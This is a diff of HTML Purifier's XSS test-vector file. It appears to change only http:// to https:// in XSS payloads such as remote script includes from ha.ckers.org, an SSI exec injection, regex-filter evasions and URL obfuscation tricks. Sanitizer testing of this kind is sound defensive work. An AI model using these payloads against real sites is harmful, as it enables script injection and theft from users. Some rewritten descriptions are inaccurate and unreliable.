@@ -510,7 +510,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Rename .js to .jpg</name>
<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT SRC=&quot;https://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Assuming you can only fit in a few characters and it filters against &quot;.js&quot; you can rename your JavaScript file to an image as an XSS vector.</desc>
<label>Other Attacks</label>
@@ -519,7 +519,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>SSI</name>
<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=https://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
<desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don&apos;t need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
<label>Other Attacks</label>
@@ -682,7 +682,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<attack>
<name>DIV w/Unicode</name>
<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;</code>
<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (https://www.sysdream.com) as a vulnerability in Hotmail.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -701,7 +701,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>UTF-7 Encoding</name>
<code>&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-</code>
<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire https://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -782,7 +782,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>Null Chars 1</name>
<code>perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out</code>
<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (https://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -807,7 +807,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
</attack>
<attack>
<name>Non-Alpha/Non-Digit</name>
<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT/XSS SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example &quot;&lt;SCRIPT\s&quot; != &quot;&lt;SCRIPT/XSS\s&quot;</desc>
<label>Embedded Character Attacks</label>
@@ -825,7 +825,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
</attack>
<attack>
<name>No Closing Script Tag</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
<code>&lt;SCRIPT SRC=https://ha.ckers.org/xss.js</code>
<desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don&apos;t actually need the &quot;&gt;&lt;/SCRIPT&gt;&quot; portion of this Cross Site Scripting vector. Firefox assumes it&apos;s safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn&apos;t affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they&apos;re not needed generally.</desc>
<label>Embedded Character Attacks</label>
@@ -844,7 +844,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<attack>
<name>Half-Open HTML/JavaScript</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
@@ -854,7 +854,7 @@ As a side note, this was also effective against a real world XSS filter I came a
</attack>
<attack>
<name>Double open angle brackets</name>
<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
<code>&lt;IFRAME SRC=https://ha.ckers.org/scriptlet.html &lt;</code>
<desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it&apos;s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won&apos;t</desc>
<label>Embedded Character Attacks</label>
@@ -864,7 +864,7 @@ As a side note, this was also effective against a real world XSS filter I came a
<attack>
<name>Extraneous Open Brackets</name>
<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
<desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
<desc>(Submitted by Franz Sedlmaier https://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (https://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -873,7 +873,7 @@ As a side note, this was also effective against a real world XSS filter I came a
<attack>
<name>Malformed IMG Tags</name>
<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
<desc>Originally found by Begeek (https://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -892,7 +892,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<attack>
<name>Event Handlers List 1</name>
<code>See Below</code>
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (https://www.secaron.de/) for the HTML+TIME updates:
-FSCommand() (execute from within an embedded Flash object)
@@ -1103,7 +1103,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 1</name>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of the following regex filter:
/&lt;script[^&gt;]+src/i</desc>
@@ -1113,7 +1113,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 2</name>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
@@ -1125,7 +1125,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 3</name>
<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Another XSS to evade this regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
@@ -1135,7 +1135,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 4</name>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Yet another XSS to evade the same filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
@@ -1146,7 +1146,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Evade Regex Filter 5</name>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>And one last XSS attack (using grave accents) to evade this regex:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
@@ -1156,7 +1156,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Filter Evasion 1</name>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1165,7 +1165,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Filter Evasion 2</name>
<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Here&apos;s an XSS example that bets on the fact that the regex won&apos;t catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1174,8 +1174,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>IP Encoding</name>
<code>&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1183,8 +1183,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>URL Encoding</name>
<code>&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1192,8 +1192,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Dword Encoding</name>
<code>&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1201,8 +1201,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Hex Encoding</name>
<code>&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.</desc>
<label>URL Obfuscation</label>
@@ -1211,8 +1211,8 @@ The total size of each number allowed is somewhere in the neighborhood of 240 to
</attack>
<attack>
<name>Octal Encoding</name>
<code>&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...</desc>
<label>URL Obfuscation</label>
@@ -1222,7 +1222,7 @@ Padding is allowed, although you must keep it above 4 total characters per class
<attack>
<name>Mixed Encoding</name>
<code>&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
The tabs and newlines only work if this is encapsulated with quotes.</desc>
<label>URL Obfuscation</label>
@@ -1232,8 +1232,8 @@ The tabs and newlines only work if this is encapsulated with quotes.</desc>
<attack>
<name>Protocol Resolution Bypass</name>
<code>&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like &quot;(ht|f)tp(s)?://&quot; (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the &quot;//&quot; to &quot;\\&quot;. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
Protocol resolution bypass (// translates to https:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like &quot;(ht|f)tp(s)?://&quot; (thanks to Ozh (https://planetOzh.com/) for part of this one). You can also change the &quot;//&quot; to &quot;\\&quot;. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1250,7 +1250,7 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Firefox Lookups 2</name>
<code>&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<code>&lt;A HREF=&quot;https://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<desc>This uses a very tiny trick that appears to work Firefox only, because if it&apos;s implementation of the &quot;feeling lucky&quot; function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It&apos;s simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.</desc>
<label>URL Obfuscation</label>
@@ -1259,7 +1259,7 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Firefox Lookups 3</name>
<code>&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<code>&lt;A HREF=&quot;https://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<desc>This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the &quot;feeling lucky&quot; function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case &quot;google&quot;).</desc>
<label>URL Obfuscation</label>
@@ -1268,8 +1268,8 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Removing Cnames</name>
<code>&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
When combined with the above URL, removing &quot;www.&quot; will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly.</desc>
<label>URL Obfuscation</label>
@@ -1278,8 +1278,8 @@ When combined with the above URL, removing &quot;www.&quot; will save an additio
</attack>
<attack>
<name>Extra dot for Absolute DNS</name>
<code>&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1287,8 +1287,8 @@ When combined with the above URL, removing &quot;www.&quot; will save an additio
</attack>
<attack>
<name>JavaScript Link Location</name>
<code>&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed)
<code>&lt;A HREF=&quot;javascript:document.location=&apos;https://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed)
JavaScript link location</desc>
<label>URL Obfuscation</label>
@@ -1297,8 +1297,8 @@ JavaScript link location</desc>
</attack>
<attack>
<name>Content Replace</name>
<code>&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>Content replace as an attack vector (assuming &quot;http://www.google.com/&quot; is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (&quot;java&amp;#x26;#x09;script:&quot; was converted into &quot;java&amp;#x09;script:&quot;.</desc>
<code>&lt;A HREF=&quot;https://www.gohttps://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>Content replace as an attack vector (assuming &quot;https://www.google.com/&quot; is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like https://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (&quot;java&amp;#x26;#x09;script:&quot; was converted into &quot;java&amp;#x09;script:&quot;.</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>

16
htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/CSS/URITest.php
View File

@@ -10,18 +10,18 @@ class HTMLPurifier_AttrDef_CSS_URITest extends HTMLPurifier_AttrDefHarness
$this->assertDef('', false);
// we could be nice but we won't be
$this->assertDef('http://www.example.com/', false);
